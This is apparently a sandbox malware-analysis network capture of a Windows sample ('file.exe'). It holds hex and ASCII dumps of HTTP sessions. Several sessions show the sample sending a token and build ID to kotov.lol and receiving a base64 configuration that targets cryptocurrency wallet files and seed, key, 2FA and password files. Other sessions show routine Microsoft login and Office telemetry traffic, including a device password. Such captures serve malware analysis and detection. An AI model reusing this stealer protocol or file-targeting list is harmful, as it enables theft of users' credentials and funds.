                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    26192.168.2.44977495.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:48 UTC316OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=----GHCAAAAKJJDAKECBGIJE
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Content-Length: 331
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-11-30 10:34:48 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 48 43 41 41 41 41 4b 4a 4a 44 41 4b 45 43 42 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 33 64 37 32 30 30 66 65 33 35 39 31 65 65 30 39 39 35 39 37 33 32 37 31 39 65 37 31 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 41 41 41 4b 4a 4a 44 41 4b 45 43 42 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 35 62 61 33 63 32 35 66 61 37 62 38 30 31 31 32 33 34 61 64 30 39 64 37 37 62 36 33 34 66 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 41 41 41 4b 4a 4a 44 41 4b 45 43 42 47 49 4a 45 0d 0a 43 6f 6e 74
                                                                                                                    Data Ascii: ------GHCAAAAKJJDAKECBGIJEContent-Disposition: form-data; name="token"63d7200fe3591ee09959732719e71375------GHCAAAAKJJDAKECBGIJEContent-Disposition: form-data; name="build_id"c5ba3c25fa7b8011234ad09d77b634f1------GHCAAAAKJJDAKECBGIJECont
                                                                                                                    2024-11-30 10:34:49 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:49 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    2024-11-30 10:34:49 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                    Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    27192.168.2.44977595.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:51 UTC316OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHC
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Content-Length: 331
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-11-30 10:34:51 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 33 64 37 32 30 30 66 65 33 35 39 31 65 65 30 39 39 35 39 37 33 32 37 31 39 65 37 31 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 35 62 61 33 63 32 35 66 61 37 62 38 30 31 31 32 33 34 61 64 30 39 64 37 37 62 36 33 34 66 31 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74
                                                                                                                    Data Ascii: ------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="token"63d7200fe3591ee09959732719e71375------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="build_id"c5ba3c25fa7b8011234ad09d77b634f1------CAFBGHIDBGHJJKFHJDHCCont
                                                                                                                    2024-11-30 10:34:52 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:52 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    2024-11-30 10:34:52 UTC1636INData Raw: 36 35 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                    Data Ascii: 658REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    28192.168.2.44977640.126.53.19443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:54 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/soap+xml
                                                                                                                    Accept: */*
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                    Content-Length: 3592
                                                                                                                    Host: login.live.com
                                                                                                                    2024-11-30 10:34:54 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                    2024-11-30 10:34:55 UTC568INHTTP/1.1 200 OK
                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                    Expires: Sat, 30 Nov 2024 10:33:55 GMT
                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                    x-ms-route-info: C533_BAY
                                                                                                                    x-ms-request-id: da913784-4464-4ae8-ad14-7ab5c3284b09
                                                                                                                    PPServer: PPV: 30 H: PH1PEPF00018BD9 V: 0
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:55 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1276
                                                                                                                    2024-11-30 10:34:55 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    29192.168.2.44977740.126.53.19443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:57 UTC446OUTPOST /ppsecure/deviceaddcredential.srf HTTP/1.0
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/soap+xml
                                                                                                                    Accept: */*
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                    Content-Length: 7642
                                                                                                                    Host: login.live.com
                                                                                                                    2024-11-30 10:34:57 UTC7642OUTData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 79 6b 6e 72 75 6f 6d 63 6e 62 6a 6a 6e 76 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 6d 2f 2e 2a 51 47 71 69 49 2d 41 24 63 33 45 38 53 51 47 3b 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 61 6b 71 72 6c 66 67 75 6b 69 6a 65 76 6c 3c 2f 4f 6c 64 4d
                                                                                                                    Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02yknruomcnbjjnv</Membername><Password>m/.*QGqiI-A$c3E8SQG;</Password></Authentication><OldMembername>02akqrlfgukijevl</OldM
                                                                                                                    2024-11-30 10:35:03 UTC542INHTTP/1.1 200 OK
                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Content-Type: text/xml
                                                                                                                    Expires: Sat, 30 Nov 2024 10:33:58 GMT
                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                    x-ms-route-info: C528_SN1
                                                                                                                    x-ms-request-id: d9834a7b-a6c6-4e90-b935-7c67ed0f2039
                                                                                                                    PPServer: PPV: 30 H: SN1PEPF0002FAA9 V: 0
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:02 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 17166
                                                                                                                    2024-11-30 10:35:03 UTC15842INData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 43 30 30 46 34 36 35 31 31 45 46 42 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 39 32 39 32 39 62 32 61 2d 62 64 39 62 2d 34 61 33 65 2d 39 34 36 64 2d 36 62 31 37 32 66 36 36 36 62 63 63 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31
                                                                                                                    Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>0018C00F46511EFB</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="92929b2a-bd9b-4a3e-946d-6b172f666bcc" LicenseID="3252b20c-d425-4711
                                                                                                                    2024-11-30 10:35:03 UTC1324INData Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66
                                                                                                                    Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    30192.168.2.44977813.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:58 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:34:58 UTC492INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:58 GMT
                                                                                                                    Content-Type: text/plain
                                                                                                                    Content-Length: 218853
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public
                                                                                                                    Last-Modified: Wed, 27 Nov 2024 15:11:14 GMT
                                                                                                                    ETag: "0x8DD0EF5BC53602D"
                                                                                                                    x-ms-request-id: a5a19dc6-401e-008c-1dff-4086c2000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103458Z-174f7845968n2hr8hC1EWR9cag00000010ug00000000a13r
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:34:58 UTC15892INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
